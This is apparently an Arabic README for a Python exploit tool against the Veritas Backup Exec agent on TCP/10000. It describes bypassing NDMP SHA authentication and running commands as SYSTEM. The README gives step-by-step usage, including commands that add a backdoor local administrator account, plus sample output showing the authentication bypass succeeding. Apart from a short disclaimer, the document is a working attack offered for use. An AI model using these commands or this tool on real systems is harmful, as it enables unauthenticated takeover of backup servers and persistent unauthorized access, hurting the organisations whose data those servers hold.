
استغلال RCE غير مصادق عليه لـ Veritas Backup Exec Agent (CVE-2021-27876/77/78) — تجاوز مصادقة SHA إلى SYSTEM عبر NDMP
استغلال تنفيذ أوامر عن بُعد غير مصادق عليه لوكيل Veritas Backup Exec (CVE-2021-27876/77/78) — تجاوز مصادقة SHA إلى SYSTEM عبر NDMP
| CVE | الوصف | CVSS 3.1 |
|---|---|---|
| CVE-2021-27876 | تجاوز المصادقة عبر التلاعب بتجزئة SHA في بروتوكول NDMP | 9.8 حرجة |
| CVE-2021-27877 | قراءة ملفات عشوائية غير مصادق عليها عبر NDMP | 9.8 حرجة |
| CVE-2021-27878 | تنفيذ أوامر نظام تشغيل عشوائي عبر NDMP_EXECUTE_COMMAND | 9.8 حرجة |
إشعار: Veritas VTS21-003
تم الإصلاح في: Backup Exec 21.3 والإصدارات الأحدث.
وكيل Veritas Backup Exec يستمع على TCP/10000 ويتحدث بروتوكول NDMP (بروتوكول إدارة بيانات الشبكة). يستغل الاستغلال ثلاث نقاط ضعف:
إساءة استخدام مصافحة TLS — يطلب الوكيل CSR أثناء مفاوضات TLS المخصصة. يقوم الاستغلال بإنشاء CA محلي، وتوقيع CSR الخاص بالوكيل، وإكمال المصافحة، وترقية المقبس إلى TLS دون أي سر مشترك مسبق.
تجاوز مصادقة SHA (CVE-2021-27876) — تحسب مصادقة SHA لـ NDMP SHA256('\x00' * 64 + challenge). نظرًا لأن كلمة المرور تُسبق ككتلة محشوة بصفر 64 بايت ولا يوجد التحقق من صحة مادة كلمة المرور من جانب الخادم، يمكن لأي عميل المصادقة كـ Administrator دون معرفة كلمة المرور.
NDMP_EXECUTE_COMMAND (CVE-2021-27878) — بمجرد المصادقة، يقوم نوع رسالة NDMP_EXECUTE_COMMAND بتشغيل أوامر نظام تشغيل عشوائية كـ NT AUTHORITY\SYSTEM. يُعاد توجيه الإخراج إلى C:\Windows\Temp\_be_out.txt ويُقرأ عبر NDMP_FILE_READ.
Python 3.8+
في التوزيعات الحديثة، يتم وضع علامة "مُدار خارجيًا" على Python (PEP 668)، لذا قم بتثبيت التبعية في بيئة افتراضية:
python3 -m venv venv
source venv/bin/activate # Windows: venv\Scripts\activate
pip install cryptography
python3 be_rce.py
أمثلة:
# تأكيد وصول SYSTEM
python3 be_rce.py 10.10.10.50 "whoami"
# تفريغ اسم المضيف والمجال
python3 be_rce.py 10.10.10.50 "whoami /all"
# إضافة مستخدم محلي كمسؤول
python3 be_rce.py 10.10.10.50 "net user pwned P@ssw0rd123! /add"
python3 be_rce.py 10.10.10.50 "net localgroup administrators pwned /add"
مثال على الإخراج:
[*] Connecting to 10.10.10.50:10000
[*] NDMP version: 9
[+] NDMP connection opened
[*] Generating CA certificate
[*] Got agent CSR (1024 bytes)
[*] Signed agent CSR and sent back
[*] SSL_HANDSHAKE CONNECT sent
[*] Upgrading to TLS
[+] TLS established
[*] Requesting SHA challenge
[*] Got 64-byte SHA challenge
[+] SHA authentication bypassed!
[*] Executing: whoami
[+] Command output:
────────────────────────────────────────
nt authority\system
────────────────────────────────────────
تم توفير هذه الأداة لاختبار الاختراق المصرح به والبحث الأمني فقط. الاستخدام ضد الأنظمة دون إذن كتابي صريح غير قانوني. لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام.